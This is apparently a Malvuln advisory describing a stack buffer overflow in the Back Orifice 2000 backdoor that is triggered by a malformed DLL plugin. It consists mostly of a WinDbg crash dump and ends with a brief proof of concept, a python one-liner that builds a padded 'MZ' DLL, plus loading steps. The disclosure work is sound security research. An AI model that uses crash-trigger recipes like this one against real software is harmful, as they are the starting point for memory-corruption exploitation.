Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/abc6a590d237b8ee180638007f67089e.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.BO2K.11.d
Vulnerability: Local Stack Buffer Overflow
Description: Back Orifice 2000 by Cult of the Dead Cow, stack BOF on corrupted DLL plugin import. Loading a specially crafted (DLL) file triggers a stack buffer overflow overwriting the EDX register.
Type: PE32
MD5: abc6a590d237b8ee180638007f67089e
Vuln ID: MVID-2021-0328
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 08/30/2021
Memory Dump:
(ef4.bec): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=07aa0000 edx=41414141 esi=00000003 edi=00000003
eip=76fced3c esp=0019e42c ebp=0019e5bc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
ntdll!ZwWaitForMultipleObjects+0xc:
76fced3c c21400 ret 14h
0:000> .ecxr
eax=07aa0000 ebx=00000001 ecx=07aa0000 edx=41414141 esi=00437400 edi=0019faa4
eip=00403f9a esp=0019ed4c ebp=0019ed7c iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210287
*** WARNING: Unable to verify checksum for Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e
Backdoor_Win32_BO2K_11_d+0x3f9a:
00403f9a 813c1050450000 cmp dword ptr [eax+edx],4550h ds:002b:48eb4141=????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
FAULTING_IP:
Backdoor_Win32_BO2K_11_d+3f9a
00403f9a 813c1050450000 cmp dword ptr [eax+edx],4550h
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00403f9a (Backdoor_Win32_BO2K_11_d+0x00003f9a)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 48eb4141
Attempt to read from address 48eb4141
PROCESS_NAME: Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e
OVERLAPPED_MODULE: Address regions for 'iertutil' and 'audiodev.dll' overlap
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 48eb4141
READ_ADDRESS: 48eb4141
FOLLOWUP_IP:
Backdoor_Win32_BO2K_11_d+3f9a
00403f9a 813c1050450000 cmp dword ptr [eax+edx],4550h
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
FAULTING_THREAD: 00000bec
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141
LAST_CONTROL_TRANSFER: from 00404754 to 00403f9a
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019ed7c 00404754 07aa0000 0019edb9 00000000 Backdoor_Win32_BO2K_11_d+0x3f9a
0019eeb0 004047a0 02765a20 00000000 00000000 Backdoor_Win32_BO2K_11_d+0x4754
0019eec4 004100f3 02765a20 0019faa4 00000001 Backdoor_Win32_BO2K_11_d+0x47a0
0019eee0 00410578 02765a20 0019faa4 00437400 Backdoor_Win32_BO2K_11_d+0x100f3
0019f350 00420f60 00437400 00000111 0019f390 Backdoor_Win32_BO2K_11_d+0x10578
0019f360 004210ed 0019faa4 00000003 00000000 Backdoor_Win32_BO2K_11_d+0x20f60
0019f390 0041fb67 00000003 00000000 00000000 Backdoor_Win32_BO2K_11_d+0x210ed
0019f3b4 00422d5e 00000003 00000000 00000000 Backdoor_Win32_BO2K_11_d+0x1fb67
0019f404 0042279a 00000000 000d0392 0019faa4 Backdoor_Win32_BO2K_11_d+0x22d5e
0019f480 0042274c 00000111 00000003 000d0392 Backdoor_Win32_BO2K_11_d+0x2279a
0019f4a0 004217b2 00000111 00000003 000d0392 Backdoor_Win32_BO2K_11_d+0x2274c
0019f500 004219ba 00000000 000907d4 00000111 Backdoor_Win32_BO2K_11_d+0x217b2
0019f51c 76d7e0bb 000907d4 00000111 00000003 Backdoor_Win32_BO2K_11_d+0x219ba
0019f548 76d88849 0042198f 000907d4 00000111 user32!_InternalCallWinProc+0x2b
0019f56c 76d8b145 00000111 00000003 000d0392 user32!InternalCallWinProc+0x20
0019f63c 76d8a89c 0042198f 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be
0019f6a8 76d6b95b 02cafd10 00000000 000d0392 user32!SendMessageWorker+0x6ff
0019f6d0 76d85493 000907d4 00000111 00000003 user32!SendMessageW+0x5b
0019f6f8 76d84dda 02c6eaa0 00000000 00000000 user32!xxxButtonNotifyParent+0x66
0019f720 76d84240 027a4f38 00000000 02c6eaa0 user32!xxxBNReleaseCapture+0x150
0019f7b8 76d836c6 02c6eaa0 00000000 00000202 user32!ButtonWndProcWorker+0xad0
0019f7ec 76d7e0bb 000d0392 00000202 00000000 user32!ButtonWndProcA+0x56
0019f818 76d88849 76d83670 000d0392 00000202 user32!_InternalCallWinProc+0x2b
0019f83c 76d8b145 00000202 00000000 00100022 user32!InternalCallWinProc+0x20
0019f90c 76d790dc 87d9fbc0 00007ff9 00000202 user32!UserCallWinProcCheckWow+0x1be
0019f978 76d6b2ee 00000000 00442ba0 00442b98 user32!DispatchMessageWorker+0x4ac
0019f9a8 76d6b0cc 000907d4 00442b98 00442b98 user32!IsDialogMessageW+0x17e
0019f9dc 0042444a 000907d4 00442b98 0019faa4 user32!IsDialogMessageA+0x13c
00442b98 00000000 00000000 00100022 005f107c Backdoor_Win32_BO2K_11_d+0x2444a
STACK_COMMAND: ~0s; .ecxr ; kb
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: Backdoor_Win32_BO2K_11_d+3f9a
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Backdoor_Win32_BO2K_11_d
IMAGE_NAME: Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e
DEBUG_FLR_IMAGE_TIMESTAMP: 3dcbc5d0
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_BO2K_11_d+3f9a
FAILURE_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e!Unknown
Exploit/PoC:
1) Create new server
2) Plugins/Configure/Plugin Configuration/insert
3) python -c "print('MZ'+'A'*10000)" > BOOM.dll
4) Load the corrupt DLL
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).